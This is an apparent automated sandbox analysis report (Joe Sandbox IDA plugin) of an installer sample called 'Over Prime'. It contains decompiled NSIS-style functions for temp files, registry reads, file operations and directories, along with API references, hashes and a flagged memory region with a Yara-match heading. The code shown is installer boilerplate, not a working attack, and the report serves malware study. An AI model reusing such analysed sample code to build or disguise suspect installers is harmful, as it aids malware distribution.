0x00402504
0x00402504
0x00402515
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse70B.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse70B.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse70B.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nse70B.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nse70B.tmp
API String ID: 2655323295-2940373232
Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406062
0x00406068
0x00406069
0x00406069
0x0040606e
0x0040606f
0x00406072
0x00406077
0x0040607a
0x00406084
0x00406091
0x00406095
0x0040609d
0x00000000
0x00000000
0x004060a1
0x00000000
0x004060a3
0x004060a3
0x004060a3
0x004060a6
0x004060a9
0x004060a9
0x004060ac
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

nsa, xrefs: 00406069
C:\Users\user\AppData\Local\Temp\, xrefs: 00406061

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce50; // 0x5be958
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce50; // 0x5be958
						 *_t34 = _t12;
						 *0x40ce50 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x5be95c
							E0040653D(_t30, _t3);
							_push(_t33);
							 *0x40ce50 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040653D(_t32, _t33 + 4);
								_t22 =  *0x40ce50; // 0x5be958
								E0040653D(_t36, _t22 + 4);
								_t25 =  *0x40ce50; // 0x5be958
								_push(_t32);
								_push(_t25 + 4);
								E0040653D();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B9D();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba6
0x00401bef
0x00401c1d
0x00401c26
0x00401c28
0x00401c2c
0x00401c31
0x00401c36
0x00401c38
0x00401bf1
0x00401bf3
0x0040292e
0x00401bf9
0x00401bf9
0x00401bfe
0x00401c05
0x00401c06
0x00401c0b
0x00401c0b
0x00401bf3
0x00000000
0x00401ba8
0x00401ba8
0x00401ba8
0x00401bab
0x00000000
0x00000000
0x00401bb1
0x00401bb5
0x00000000
0x00401bb7
0x00401bb9
0x00000000
0x00401bbf
0x00401bbf
0x00401bc2
0x00401bc9
0x00401bce
0x00401bd8
0x00401bdd
0x00401be2
0x00401be6
0x00402a94
0x00402c2a
0x00402c2d
0x00402c33
0x00402c33
0x00401bb9
0x00000000
0x00401bb5
0x0040238a
0x00402397
0x00402398
0x0040239d
0x0040239d
0x00402c35
0x00402c39

APIs

GlobalFree.KERNEL32(005BE958), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000), ref: 00406779

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2
X[, xrefs: 00401B9E, 00401BCE, 00401BDD, 00401C06, 00401C31, 00401C38

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call$X[
API String ID: 3292104215-1876926903
Opcode ID: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
Opcode Fuzzy Hash: 4fd3103ddbbf3038e738bd6255fa64635d35017c94b9f6e6824ea6dd5921d07e
Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004022FF Relevance: 4.6, APIs: 3, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004022FF(void* __eflags) {
				WCHAR* _t34;
				WCHAR* _t37;
				WCHAR* _t39;
				void* _t41;

				_t39 = E00402DA6(_t34);
				_t37 = E00402DA6(0x11);
				 *((intOrPtr*)(_t41 + 8)) = E00402DA6(0x23);
				if(E00406873(_t39) != 0) {
					 *(_t41 - 0x70) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x6c)) = 2;
					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
					_t27 =  *((intOrPtr*)(_t41 + 8));
					 *(_t41 - 0x68) = _t39;
					 *(_t41 - 0x64) = _t37;
					 *((intOrPtr*)(_t41 - 0x56)) =  *((intOrPtr*)(_t41 + 8));
					 *((short*)(_t41 - 0x60)) =  *((intOrPtr*)(_t41 - 0x28));
					E0040559F(_t34, _t27);
					if(SHFileOperationW(_t41 - 0x70) != 0) {
						goto L1;
					}
				} else {
					L1:
					E0040559F(0xfffffff9, _t34); // executed
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}

0x00402307
0x00402310
0x00402318
0x00402322
0x00402335
0x00402338
0x00402345
0x0040234f
0x00402354
0x0040235d
0x00402360
0x00402363
0x00402366
0x0040236a
0x0040237b
0x00000000
0x00402381
0x00402324
0x00402324
0x00402327
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

Part of subcall function 00406873: FindFirstFileW.KERNELBASE(75B53420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
Part of subcall function 00406873: FindClose.KERNEL32(00000000), ref: 0040688A

lstrlenW.KERNEL32 ref: 0040233F
lstrlenW.KERNEL32(00000000), ref: 0040234A
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 9a68a55590cdbc49e093b1ff0954ec6e3e9e6f0d69c6d92c0435d44f9c0a3784
Instruction ID: 04a4b26c59b21466d08f766bca7c88c70db01468de87939535198cd3568d8cbb
Opcode Fuzzy Hash: 9a68a55590cdbc49e093b1ff0954ec6e3e9e6f0d69c6d92c0435d44f9c0a3784
Instruction Fuzzy Hash: 40115A71D00314AADB10EFBAD949A9EB6B8AF04354F10843BA405FB2C1E6BCC9408B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025a3
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse70B.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: eccd9d4b0bb643115546dd6d5a73375c994f39410b9253701d1b90d0f26434eb
Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
Opcode Fuzzy Hash: eccd9d4b0bb643115546dd6d5a73375c994f39410b9253701d1b90d0f26434eb
Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D

Uniqueness

Uniqueness Score: -1.00%

Function 02C3797F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

Strings

AAbh, xrefs: 02C37A3D

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: AAbh
API String ID: 1029625771-1729554428
Opcode ID: 3261a167221967de3953847f09773837e141c25eafe56f78fdbafe999036d28f
Instruction ID: 0c8185007663306867e48673952f588a96fdf1b4700c9486cdcd69af7fbc471f
Opcode Fuzzy Hash: 3261a167221967de3953847f09773837e141c25eafe56f78fdbafe999036d28f
Instruction Fuzzy Hash: C14168B5A043498FDB31DE698D447EF37A7AFD9360FA4C02ADC489B208D7304A82CB51

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t35 = E00402DE6(_t40, 0x20019);
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E00406484(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}

0x0040252a
0x0040252a
0x00402536
0x00402538
0x0040253f
0x00402542
0x0040292e
0x00402548
0x0040254b
0x00402566
0x00402596
0x00402596
0x00402599
0x00402568
0x0040256c
0x00402585
0x0040258c
0x0040258f
0x0040256e
0x00402571
0x0040257c
0x004025f5
0x00000000
0x00000000
0x00000000
0x00402571
0x0040256c
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse70B.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 5be003824b205ba75d8ca103029a2e8d4b87374d35fb2bc4cf25b40dddb2618e
Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
Opcode Fuzzy Hash: 5be003824b205ba75d8ca103029a2e8d4b87374d35fb2bc4cf25b40dddb2618e
Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

